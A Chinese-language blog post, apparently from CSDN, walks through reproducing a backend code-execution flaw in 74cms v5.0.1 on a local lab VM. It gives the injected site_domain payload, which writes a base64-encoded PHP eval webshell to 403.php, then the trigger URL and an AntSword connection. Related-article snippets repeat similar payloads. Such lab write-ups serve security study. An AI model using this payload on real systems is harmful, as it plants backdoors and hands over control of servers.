74cms v5.0.1 漏洞复现

最新推荐文章于 2023-03-19 22:39:33 发布
最新推荐文章于 2023-03-19 22:39:33 发布
阅读量3.3k 收藏 11
点赞数 1
分类专栏: 渗透测试 文章标签: php 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/P_lang/article/details/124513778
版权

一、环境搭建

这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。
1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html
请添加图片描述
2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。
请添加图片描述
3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述

OK,系统安装完成。

二、漏洞利用

1.登录后台以后,点击保存网站配置的同时用burpsuite抓包。
请添加图片描述
请添加图片描述
2.修改site_domain的内容,这里对内容进行base64加密:site_domain=‘,file_put_contents(‘403.php’,base64_decode(‘PD9waHAgZXZhbCgmX1BPU1QoJzEyMycpKTs/Pg==’)),’
请添加图片描述
3.这里等号需要URL编码

请添加图片描述
4.再次访问:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/url.php,使恶意语句成功执行。
请添加图片描述
5.一句话木马已被写入:
在这里插入图片描述

6.使用蚁剑连接:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/403.php
在这里插入图片描述
OK,连接成功,over。

成都残疾人驾校彭老师
关注
专栏目录
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
74CMS漏洞复现
小小猪的博客
12-01 4338
74CMS漏洞复现 漏洞描述: 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围: 74CMS_v5.0.1 版本低于6.0.48 环境复现: 这里采用安鸾渗透实战平台的靶机 地址 漏洞复现: 访问http://www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl发现报错 访问 www.whalwl.site:8019/in..
74cms 5.0.1版本文件包含漏洞复现
ANYOUZHEN的博客
06-04 661
漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。下载地址: 下载后解压到phpstudy的根目录www里面输入网址,http://127.0.0.1/upload/install.php一直点击下一步,输入数据库名称和密码进入系统抓个包看看将包中的domain后面的改成 base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode 然后我们点击send进行发包,看到返回后stat
74CMS模版注入漏洞复现
sGanYu
04-15 1790
骑士cms人才系统,是一项基于php+mysql为核心开发的一套免费+开源业人才软件系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。 该漏洞影响版本: CMS < 6.0.48 漏洞复现 url: http://目标IP地址/index.php?m=home&a=assign_resume_tpl 以post方.
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 373
RCE:远程代码、命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
74cms v5.0.1漏洞
weixin_56049038的博客
04-13 2843
摘 要 远程连接命令/代码执行漏洞,简称RCE漏洞。RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口...
74cms v5.0.1 后台跨站请求伪造漏洞 CVE-2019-11374.md
最新发布
04-08
74CMS v5.0.1后台跨站请求伪造漏洞CVE-2019-11374的详细解读如下: ### 漏洞概述 跨站请求伪造(Cross-site Request Forgery,简称CSRF)是一种常见的网络安全漏洞。该漏洞允许攻击者误导合法用户执行非预期的命令...
74CMS v5.0.1 后台 CSRF 漏洞分析与复现
"74cms v5.0.1 后台存在跨站请求伪造(CSRF)漏洞,CVE编号CVE-2019-11374。攻击者可利用此漏洞诱使管理员执行恶意操作,创建新的后台管理员账户,获取系统控制权。受影响的版本仅为74CMS v5.0.1。" ### 漏洞详解 ...
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
74cms 骑士人才系统 v5.0.1 正式版
10-22
骑士cms人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。 骑士cms人才系统 v5.0.1 更新内容:新增:后台增加跳转页面新增:短信预警提醒,方便客户及时充值新增:企业与个人账号通用新增:未付费且登录的企业单独呈现,方便追踪客户新增:后台统计增加列表页。方便追踪客户新增:导出简历增加时间段、年龄段、性别等条件筛选新增:简历增加项目经验新增:PC端支持https新增:对接企查查新增:关注公众号领红包,快速吸粉新增:专题招聘会触屏版新增:事业单位招考触屏版新增:企业专访触屏版新增:内置节日主题优化:表单填写优化:提交操作增加等待提醒优化:套餐改为点数,对简历进行分级收费优化:小程序深度优化优化:系统日志显示企业名称与个人名字,方便追踪客户
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版.zip
07-16
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版  更新日志  新增:后台增加跳转页面 新增:短信预警提醒,方便客户及时充值 新增:企业与个人账号通用 新增:未付费且登录的企业单独呈现,方便追踪客户 新增:后台统计增加列表页。方便追踪客户 新增:导出简历增加时间段、年龄段、性别等条件筛选 新增:简历增加项目经验 新增:PC端支持https 新增:对接企查查 新增:关注公众号领红包,快速吸粉 新增:专题招聘会触屏版 新增:事业单位招考触屏版 新增:企业专访触屏版 新增:内置节日主题 优化:表单填写 优化:提交操作增加等待提醒 优化:套餐改为点数,对简历进行分级收费 优化:小程序深度优化 优化:系统日志显示企业名称与个人名字,方便追踪客户 骑士PHP人才系统简介 骑士PHP人才系统(74cms)是一项基于PHP MYSQL为核心开发的一套免费 开源专业人才系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。凭借骑士网络的不断创新精神和认真的工作态度,相信骑士能够为您带来全新的使用体验! 骑士PHP人才系统功能特征: 多模式,更加灵活 用户可以自由选择积分模式和服务套餐模式,积分模式更灵活,套餐模式更直观。 模板机制,轻松改版 全新的模板引擎机制,界面完全与程序分离,管理员可轻松制作模板和在后台切换模板。 在线支付,无人值守 集成网上支付,自动收款并开通相关服务,自动充值,自动开通。 搜索优化,完美植入 灵活自定义URL,自定义目录结构,自定义关键字,有效提高搜索引擎排名。 集成火车头,自动采集 定时定点采集各大招聘网站的信息,实时自动发布信息。 使用简单,功能强大 软件使用简单灵活,功能强大,更多优秀模块陆续开发中。 骑士PHP人才系统前台页面: 骑士PHP人才系统后管理 后台路径:/admin/admin_index.php 用户名与密码:admin(安装时可以设置) 后台页面: 相关阅读 同类推荐:人才招聘系统
74CMS_v5.0.1后台RCE分析1
08-03
I函数简介获取变量如果要获取的变量类型是 get、post 或 put,可以统一用 param 变量类型,param 变量类型是框架特有的支持自动判断当前请求类
74cms v4.2.X任意文件读取漏洞
09-06
网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上任意文件,这可能导致敏感信息泄露,甚至...
74cms 5.0.1 版本命令执行漏洞复现
不忘初心,护天下安全!
10-20 2289
从整体分析来看,对site_domain的输入,只会使用trim,htmlspecialchars,stripslashes,strip_tags,think_filter这几个函数做过滤,对于执行php代码,写入shell,有影响的只有strip_tags,可以通过编码绕过正常的url.php文件内容如下,从之前的代码可以看出更新域名将更新domain和COOKIE_DOMAIN对应的值,原本的域名为74cms.com,写入到文件中会在最前面加一个.。
74cms v5.0.1存在远程连接命令/代码执行漏洞
qq_58091216的博客
05-14 786
由于小编最近在面试找工作,所以没有时间进行更新文章,先浅更一个任意代码执行漏洞。 1.打开127.0.0.1/74cms/upload/install.php进行安装 2.使用管理员账号登陆后台,点击保存网络配置并使用burpsuite抓包。 3.之后修改site_domain(<?php phpinfo();?> base64之PD9waHAgcGhwaW5mbygpOz8+),site_domain=',file_put_contents('403.php',base6
刷洞2---74cms注入漏洞
river
05-17 2384
基础积累: 1.在我们拿到一套源码的时候,首先需要寻找连接数据库的密码和网站后台的密码。 第一种方法是看文件名,看看有没有明显的config.php global_function.php类似的文件。 第二种方式是全局搜索 &amp;quot;new mysql(&amp;quot; &amp;quot;mysqli_connect(&amp;quot; &amp;quot;new PDO&amp;quot; 这个是php连接数据库的常用操作,
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 1581
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成都残疾人驾校彭老师

你的 打赏将是我的进步的一大动

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值